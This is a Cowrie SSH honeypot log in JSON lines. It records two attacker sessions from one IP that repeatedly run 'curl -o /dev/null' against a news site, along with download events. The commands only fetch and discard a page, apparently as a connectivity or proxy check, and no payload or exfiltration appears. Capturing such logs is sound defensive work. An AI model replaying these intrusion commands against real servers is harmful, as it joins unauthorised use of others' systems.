{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.533014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.535093Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.537348Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.539620Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.559049Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.560495Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.562436Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.563729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.572040Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.572958Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.596859Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.598166Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.638461Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.641181Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.642963Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.646417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.647677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.652523Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.653502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.684954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.686362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.689913Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.692665Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.694590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.726275Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.728138Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.729495Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.733502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.734822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.767567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.768868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.771859Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.772952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.782939Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.786581Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.810874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.812134Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.814754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.815882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.831425Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.842570Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.852141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.853178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.855920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.857078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.883590Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.888045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.889422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.892811Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.895064Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.899353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.900483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.903486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.906333Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.913249Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.915852Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.927387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.928589Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.942255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.943721Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.945563Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.948014Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.964648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.965702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:34.984589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.985923Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.992782Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:34.995124Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.002694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.004149Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.022754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.024040Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.043817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.045105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.061391Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.062982Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.079419Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.080842Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.082297Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.086372Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.099659Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.100947Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.106608Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.120779Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.123225Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.126531Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.127664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.140252Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.144550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.145951Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.167614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.168837Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.185967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.187357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.204685Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.206035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.209432Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.228547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.229775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:35.243891Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:35.245008Z","src_ip":"212.227.125.160","session":"7541ed730449"}
